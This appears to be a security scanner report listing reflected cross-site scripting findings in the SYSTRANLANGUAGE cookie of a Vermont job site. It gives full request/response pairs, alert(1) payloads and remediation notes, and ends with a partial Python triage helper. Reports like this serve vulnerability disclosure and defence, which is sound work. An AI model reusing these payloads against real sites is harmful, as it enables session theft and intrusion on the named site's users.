Set-Cookie: CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D;path=/
Content-Type: text/html; charset=UTF-8

<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="endab86"><img src=a onerror=alert(1)>4a24dd4153a">
...[SNIP]...
The value of the SYSTRANLANGUAGE cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 54e5b"%3balert(1)//093651f14f0 was submitted in the SYSTRANLANGUAGE cookie. This input was echoed as 54e5b";alert(1)//093651f14f0 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /ada/mn_ssncheck.cfm HTTP/1.1
Host: www.vermontjoblink.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TEST=1; SYSTRANLANGUAGE=en54e5b"%3balert(1)//093651f14f0; CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D; CFID=4223843;
Response
HTTP/1.1 200 OK
Connection: close
Date: Fri, 29 Apr 2011 21:14:43 GMT
Server: Microsoft-IIS/6.0
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))(PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (l 0 s 0 v 0 o 0))
Set-Cookie: CFID=4223843;path=/
Set-Cookie: CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D;path=/
Content-Type: text/html; charset=UTF-8

<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:la
...[SNIP]...
<!DOCTYPE HTML PUBLIC \"-//W3C//DTD HTML 4.01 Transitional//EN54E5B";ALERT(1)//093651F14F0\">
...[SNIP]...
The value of the SYSTRANLANGUAGE cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload da9e7"><img%20src%3da%20onerror%3dalert(1)>3b3bc65ba7a was submitted in the SYSTRANLANGUAGE cookie. This input was echoed as da9e7"><img src=a onerror=alert(1)>3b3bc65ba7a in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /ada/mn_ssncheck.cfm HTTP/1.1
Host: www.vermontjoblink.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TEST=1; SYSTRANLANGUAGE=enda9e7"><img%20src%3da%20onerror%3dalert(1)>3b3bc65ba7a; CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D; CFID=4223843;
Response
HTTP/1.1 200 OK
Connection: close
Date: Fri, 29 Apr 2011 21:14:38 GMT
Server: Microsoft-IIS/6.0
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))(PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (l 0 s 0 v 0 o 0))
Set-Cookie: CFID=4223843;path=/
Set-Cookie: CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D;path=/
Content-Type: text/html; charset=UTF-8

<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="enda9e7"><img src=a onerror=alert(1)>3b3bc65ba7a">
...[SNIP]...
The value of the SYSTRANLANGUAGE cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 26637"><img%20src%3da%20onerror%3dalert(1)>1d500488022 was submitted in the SYSTRANLANGUAGE cookie. This input was echoed as 26637"><img src=a onerror=alert(1)>1d500488022 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /ada/mn_veterans_dsp.cfm HTTP/1.1
Host: www.vermontjoblink.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TEST=1; SYSTRANLANGUAGE=en26637"><img%20src%3da%20onerror%3dalert(1)>1d500488022; CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D; CFID=4223843;
Response
HTTP/1.1 200 OK
Connection: close
Date: Fri, 29 Apr 2011 21:14:38 GMT
Server: Microsoft-IIS/6.0
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))(PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (l 0 s 0 v 0 o 0))
Set-Cookie: CFID=4223843;path=/
Set-Cookie: CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D;path=/
Content-Type: text/html; charset=UTF-8

<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en26637"><img src=a onerror=alert(1)>1d500488022">
...[SNIP]...
The value of the SYSTRANLANGUAGE cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e9b46"%3balert(1)//306a24f14a3 was submitted in the SYSTRANLANGUAGE cookie. This input was echoed as e9b46";alert(1)//306a24f14a3 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /ada/mn_veterans_dsp.cfm HTTP/1.1
Host: www.vermontjoblink.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TEST=1; SYSTRANLANGUAGE=ene9b46"%3balert(1)//306a24f14a3; CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D; CFID=4223843;
Response
HTTP/1.1 200 OK
Connection: close
Date: Fri, 29 Apr 2011 21:14:43 GMT
Server: Microsoft-IIS/6.0
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))(PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (l 0 s 0 v 0 o 0))
Set-Cookie: CFID=4223843;path=/
Set-Cookie: CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D;path=/
Content-Type: text/html; charset=UTF-8

<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:la
...[SNIP]...
<!DOCTYPE HTML PUBLIC \"-//W3C//DTD HTML 4.01 Transitional//ENE9B46";ALERT(1)//306A24F14A3\">
...[SNIP]...
The value of the SYSTRANLANGUAGE cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 855f5"><img%20src%3da%20onerror%3dalert(1)>7bed8c41200 was submitted in the SYSTRANLANGUAGE cookie. This input was echoed as 855f5"><img src=a onerror=alert(1)>7bed8c41200 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /ada/mn_warn_dsp.cfm?def=false HTTP/1.1
Host: www.vermontjoblink.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TEST=1; SYSTRANLANGUAGE=en855f5"><img%20src%3da%20onerror%3dalert(1)>7bed8c41200; CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D; CFID=4223843;
Response
HTTP/1.1 200 OK
Connection: close
Date: Fri, 29 Apr 2011 21:15:55 GMT
Server: Microsoft-IIS/6.0
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))(PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (l 0 s 0 v 0 o 0))
Set-Cookie: CFID=4223843;path=/
Set-Cookie: CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D;path=/
Content-Type: text/html; charset=UTF-8

<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en855f5"><img src=a onerror=alert(1)>7bed8c41200">
...[SNIP]...
The value of the SYSTRANLANGUAGE cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6ec58"%3balert(1)//809999d932e was submitted in the SYSTRANLANGUAGE cookie. This input was echoed as 6ec58";alert(1)//809999d932e in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /ada/mn_warn_dsp.cfm HTTP/1.1
Host: www.vermontjoblink.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TEST=1; SYSTRANLANGUAGE=en6ec58"%3balert(1)//809999d932e; CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D; CFID=4223843;
Response (redirected)
HTTP/1.1 200 OK
Connection: close
Date: Fri, 29 Apr 2011 21:15:31 GMT
Server: Microsoft-IIS/6.0
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))(PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (l 0 s 0 v 0 o 0))
Set-Cookie: CFID=4223843;path=/
Set-Cookie: CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D;path=/
Content-Type: text/html; charset=UTF-8

<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:la
...[SNIP]...
<!DOCTYPE HTML PUBLIC \"-//W3C//DTD HTML 4.01 Transitional//EN6EC58";ALERT(1)//809999D932E\">
...[SNIP]...
The value of the SYSTRANLANGUAGE cookie is copied into a JavaScript string literal delimited by double quotation marks. The payload 206dd"%3balert(1)//d34d3e0b702 was submitted in the SYSTRANLANGUAGE cookie and came back, converted to upper case, as 206DD";ALERT(1)//D34D3E0B702 in the application's response.
The unencoded " and // confirm that the string literal can be terminated and the rest of the statement commented out. Note, however, that the value is echoed in upper case: JavaScript identifiers are case-sensitive, so ALERT(1) does not resolve to alert and this exact proof of concept would raise a ReferenceError rather than execute. Confirming execution in this context needs a payload that survives being upper-cased.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /ada/mn_warn_dsp.cfm?def=false HTTP/1.1
Host: www.vermontjoblink.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TEST=1; SYSTRANLANGUAGE=en206dd"%3balert(1)//d34d3e0b702; CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D; CFID=4223843;
Response
HTTP/1.1 200 OK
Connection: close
Date: Fri, 29 Apr 2011 21:16:08 GMT
Server: Microsoft-IIS/6.0
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))(PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (l 0 s 0 v 0 o 0))
Set-Cookie: CFID=4223843;path=/
Set-Cookie: CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D;path=/
Content-Type: text/html; charset=UTF-8

<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:la
...[SNIP]...
<!DOCTYPE HTML PUBLIC \"-//W3C//DTD HTML 4.01 Transitional//EN206DD";ALERT(1)//D34D3E0B702\">
...[SNIP]...
The value of the SYSTRANLANGUAGE cookie is copied into the value of an HTML tag attribute delimited by double quotation marks, here the xml:lang attribute of the <html> element. The payload e0fe3"><img%20src%3da%20onerror%3dalert(1)>116f633914f was submitted in the SYSTRANLANGUAGE cookie. This input was echoed as e0fe3"><img src=a onerror=alert(1)>116f633914f in the application's response, with the ", < and > unencoded and the case preserved.
This proof-of-concept attack demonstrates that arbitrary JavaScript can be injected into the application's response: the " closes the attribute, the > closes the <html> start tag, and the browser creates the injected <img> element and runs its onerror handler when src=a fails to load. Two details in the response confirm that this works as shown. It is served as text/html rather than application/xhtml+xml, so despite the XHTML doctype the browser uses its tolerant HTML parser, which simply moves an <img> that appears before <head> into the body. And the CFID and CFTOKEN session cookies are set without the HttpOnly or Secure attributes, so script executing here can read them from document.cookie.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /ada/mn_warn_dsp.cfm HTTP/1.1
Host: www.vermontjoblink.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TEST=1; SYSTRANLANGUAGE=ene0fe3"><img%20src%3da%20onerror%3dalert(1)>116f633914f; CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D; CFID=4223843;
Response (redirected)
HTTP/1.1 200 OK
Connection: close
Date: Fri, 29 Apr 2011 21:15:18 GMT
Server: Microsoft-IIS/6.0
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))(PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (l 0 s 0 v 0 o 0))
Set-Cookie: CFID=4223843;path=/
Set-Cookie: CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D;path=/
Content-Type: text/html; charset=UTF-8

<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="ene0fe3"><img src=a onerror=alert(1)>116f633914f">
...[SNIP]...
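Added example, not part of the scanner output: a small triage helper that re-checks the two kinds of reflection shown for this cookie against the response text, in the way the scanner's own canary check works. It takes the random prefix and suffix that were wrapped around the payload, finds what came back between them, works out from the preceding text whether the reflection sits in an attribute value or in a JavaScript string literal, and reports whether the quote and angle-bracket characters survived unencoded and whether the case did. The sample bodies are constructed from the snippets on this page, plus a hand-made entity-encoded variant that shows what a fixed response looks like; the context detection is a heuristic over the preceding text, not a full HTML parser.

```python
import re
from dataclasses import dataclass
from typing import Optional

# Response fragments constructed from the snippets shown in this report.
ATTR_BODY = (
    '<?xml version="1.0" encoding="utf-8"?> '
    '<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" '
    '"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> '
    '<html xmlns="http://www.w3.org/1999/xhtml" '
    'xml:lang="ene0fe3"><img src=a onerror=alert(1)>116f633914f"> ...[SNIP]...'
)
# Script-string context from the same page; the application wrote the value back upper-cased.
JS_BODY = (
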